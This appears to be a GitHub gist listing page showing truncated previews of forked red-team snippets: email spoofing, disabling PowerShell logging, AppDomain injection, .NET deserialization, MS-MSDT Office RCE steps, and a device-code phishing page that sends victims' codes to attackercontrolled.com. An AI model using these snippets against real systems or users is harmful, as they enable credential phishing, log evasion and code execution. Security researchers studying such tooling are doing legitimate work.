Skip to content

Instantly share code, notes, and snippets.

Avatar

Steve Borosh rvrsh3ll

View GitHub Profile
@rvrsh3ll
rvrsh3ll / Export_All_Yammer_Users.ps1
Created Oct 24, 2022 — forked from Benoit-Gaumard/Export_All_Yammer_Users.ps1
Export all Yammer users through the Yammer REST API with PowerShell
View Export_All_Yammer_Users.ps1
##############################################################################
# Export all Yammer users through the Yammer REST API with PowerShell
###############################################################################
# Variables
$baererToken = "YourBaererToken"
$yammerBaseUrl = "https://www.yammer.com/api/v1"
# Function Get-BaererToken
Function Get-BaererToken()
@rvrsh3ll
rvrsh3ll / PowerShellNTFSStaticFileServer.ps1
Created Oct 22, 2022 — forked from Tiberriver256/PowerShellNTFSStaticFileServer.ps1
This script starts a small web server listening on localhost:8080 that will impersonate the authenticated user and serve static content. This means if they do not have NTFS permissions to the file they will get an access denied or a 404 file not found if they do not have NTFS access to list contents of the directory.
View PowerShellNTFSStaticFileServer.ps1
function Get-DirectoryContent {
<#
.SYNOPSIS
Function to get directory content
.EXAMPLE
Get-DirectoryContent -Path "C:\" -HeaderName "poshserver.net" -RequestURL "http://poshserver.net" -SubfolderName "/"
View gist:2139f0ae7869f268dec4c6007d434185
//All credit goes to Ysoserial.net and the great @tiraniddo
//Snippets copied from ysoserial.net
//https://thewover.github.io/Mixed-Assemblies/ - Great read!
//https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui - Another great read
using System;
using System.Collections.Generic;
using System.Runtime.Serialization.Formatters.Binary;
using System.IO;
using System.Reflection;
@rvrsh3ll
rvrsh3ll / info.txt
Created Oct 5, 2022 — forked from hook-s3c/info.txt
Disable Powershell logging
View info.txt
Logs are held by default in the user profile:
\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
this directory also hosts per-application logs
--------------------------------------------------------------
Disable Logging...
remove-module psreadline
@rvrsh3ll
rvrsh3ll / spoof.py
Created Oct 3, 2022 — forked from ustayready/spoof.py
Simple unfinished SMTP spoof script for use with Office365 DirectSend SmartHosts
View spoof.py
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import ssl
import email
import argparse
@rvrsh3ll
rvrsh3ll / S3UpDown.ps1
Created Aug 21, 2022 — forked from pmolchanov/S3UpDown.ps1
Quick n Dirty S3 Upload/Download for Powershell
View S3UpDown.ps1
# Upload
&{
$ErrorActionPreference = 'Stop'
$AWSRegion = "us-east-1"
$AWSAccessKeyId = "TODO: Access Key"
$AWSSecretAccessKey = "TODO: Secret Access Key"
$BucketName = "TODO: Bucket Name"
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") | Out-Null
$OpenFileDialog = New-Object System.Windows.Forms.OpenFileDialog
$OpenFileDialog.ShowDialog() | Out-Null
@rvrsh3ll
rvrsh3ll / generate.html
Created Aug 1, 2022 — forked from Mr-Un1k0d3r/generate.html
office device code phishing
View generate.html
<!-- This page can be formatted to look like something more interesting -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
$.get("https://cors-anywhere.herokuapp.com/https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0&client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&resource=https://graph.windows.net").done(function(data) {
$.get("https://attackercontrolled.com/?id=" + data.device_code);
document.write(data.message);
});
</script>
@rvrsh3ll
rvrsh3ll / FindingComputersWithLocalAdmin.md
Created Jun 29, 2022 — forked from leechristensen/FindingComputersWithLocalAdmin.md
Useful cypher queries to find computers that are local admin on other computers, or to find groups containing bother users/computers.
View FindingComputersWithLocalAdmin.md

Computer accounts added to local admins on machines via a group in the local admins

MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup

Computer accounts added to local admins on machines explicitly

@rvrsh3ll
rvrsh3ll / fxstmp.cs
Created Jun 1, 2022 — forked from code-scrap/fxstmp.cs
FXSTMP AppDomain Injection. - FXSTHIS!
View fxstmp.cs
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
public sealed class MyAppDomainManager : AppDomainManager
{
public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
{
@rvrsh3ll
rvrsh3ll / ms-msdt.MD
Created May 30, 2022 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process
View ms-msdt.MD

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.